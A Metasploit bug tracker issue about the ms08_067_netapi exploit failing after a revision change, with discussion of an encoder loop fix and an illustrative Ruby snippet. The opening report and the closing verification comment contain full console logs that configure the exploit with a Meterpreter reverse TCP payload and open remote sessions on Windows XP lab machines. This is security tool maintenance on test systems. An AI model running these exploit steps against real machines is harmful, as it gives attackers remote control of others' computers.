Bug #2310
ms08_067_netapi and some other exploits do not work since rev9914
| Status: | Closed | Start date: | 07/29/2010 |
|---|---|---|---|
| Priority: | Normal | Due date: | |
| Assignee: | Joshua J. Drake | % Done: | 100% |
| Category: | modules - exploits | | |
| Target version: | Metasploit 3.5.0 | | |
| Resolution: | fixed | Release Note: | |
Description
Hi,
Since Rev 9914 I'm not able to trigger the ms08_067_netapi exploit anymore against a vulnerable test computer. Below is a small screen dump:
```
kill_tinnitus:/opt/metasploit/framework3/trunk# ./msfconsole

[msfconsole ASCII banner]

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 568 exploits - 292 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9913 updated 7 days ago (2010.07.22)

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.30.11
RHOST => 192.168.30.11
msf exploit(ms08_067_netapi) > set LHOST 192.168.30.1
LHOST => 192.168.30.1
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.30.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:French
[*] Selected Target: Windows XP SP2 French (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.30.11
[*] Meterpreter session 1 opened (192.168.30.1:4444 -> 192.168.30.11:1031) at Thu Jul 29 17:11:27 +0200 2010
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) > exit

kill_tinnitus:/opt/metasploit/framework3/trunk# svn up
......
kill_tinnitus:/opt/metasploit/framework3/trunk# ./msfconsole

[msfconsole ASCII banner]

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 574 exploits - 292 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9942 updated today (2010.07.29)

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.30.1
LHOST => 192.168.30.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.30.11
RHOST => 192.168.30.11
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.30.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:French
[*] Selected Target: Windows XP SP2 French (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
```
Associated revisions
fix next/break handling inside new loop -- fixes #2310
git-svn-id: file:///home/svn/framework3/trunk@9951 4d416f70-5f16-0410-b530-b9f4589650da
History
Updated by Andrew Stubbs over 1 year ago
Seen this too - not sure of the exact revision it stopped at - but during the last week most likely.
Updated by guess-it dzingg over 1 year ago
The best way to get it to work is to revert EncodedPayload.encode in ./lib/msf/core/encoded_payload.rb to the one in version 9913.
Looks like the iterations system in this function is not stable yet.
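The commit message ("fix next/break handling inside new loop") and the comment above point at the same Ruby control-flow pitfall. The following constructed illustration is not Metasploit's code; it assumes two hypothetical toy encoders, a single bad character, and a chained iterations loop like the one described, and shows why `next` inside the inner `times` block lets a tainted buffer escape while breaking out of the inner loop lets the outer loop move on to the next encoder.

```ruby
# Constructed illustration (not Metasploit's code) of the next/break pitfall
# named in the r9951 commit message: in Ruby, `next` inside an inner `times`
# block only skips the rest of that pass, so a buffer that already failed the
# bad-character check is carried into the next pass and may be returned.
BAD_CHARS = ["\x00"].freeze

# Two hypothetical encoders. Output of pass n is the input of pass n+1.
ENCODERS = {
  # always emits a forbidden null byte, so it should be skipped entirely
  broken: ->(buf) { buf + "\x00" },
  # adds 1 to every byte (mod 256); never yields a null for the sample input
  add1:   ->(buf) { buf.bytes.map { |b| ((b + 1) & 0xff).chr }.join },
}.freeze

def bad?(buf)
  BAD_CHARS.any? { |c| buf.include?(c) }
end

# Buggy loop: `next` skips only the current pass; the encoder is never
# abandoned and its last buffer is returned whether or not it is clean.
def encode_buggy(raw, iterations)
  ENCODERS.each_value do |enc|
    buf = raw
    iterations.times do
      buf = enc.call(buf)
      next if bad?(buf)   # intended as "try the next encoder", but it is not
    end
    return buf            # the broken encoder's tainted output escapes here
  end
  nil
end

# Fixed loop: a failed pass breaks out of the inner loop with nil, the outer
# loop then moves on (`next`) to the following encoder; only clean output
# is returned. `times` returns the count on normal completion, so nil means
# the inner loop was abandoned.
def encode_fixed(raw, iterations)
  ENCODERS.each_value do |enc|
    buf = raw
    result = iterations.times do
      buf = enc.call(buf)
      break nil if bad?(buf)  # abandon this encoder entirely
    end
    next if result.nil?       # try the next encoder
    return buf
  end
  nil                         # no encoder produced a clean buffer
end
```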
Updated by Joshua J. Drake over 1 year ago
- Status changed from New to Resolved
- % Done changed from 0 to 100
Applied in changeset r9951.
Updated by Joshua J. Drake over 1 year ago
- Category set to modules - exploits
- Assignee set to Joshua J. Drake
- Target version set to Metasploit 3.5.0
- Resolution set to fixed
Thanks for the report. Great eye and fix sussuro!
Updated by Jonathan Cran over 1 year ago
- Status changed from Resolved to Closed
OK: Exploit looks good, logs as follows:

```
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.91     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.1.201    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set lport 666
lport => 666
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.201:666
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.1.91
[*] Meterpreter session 1 opened (192.168.1.201:666 -> 192.168.1.91:1246) at 2010-08-13 21:49:40 -0700
```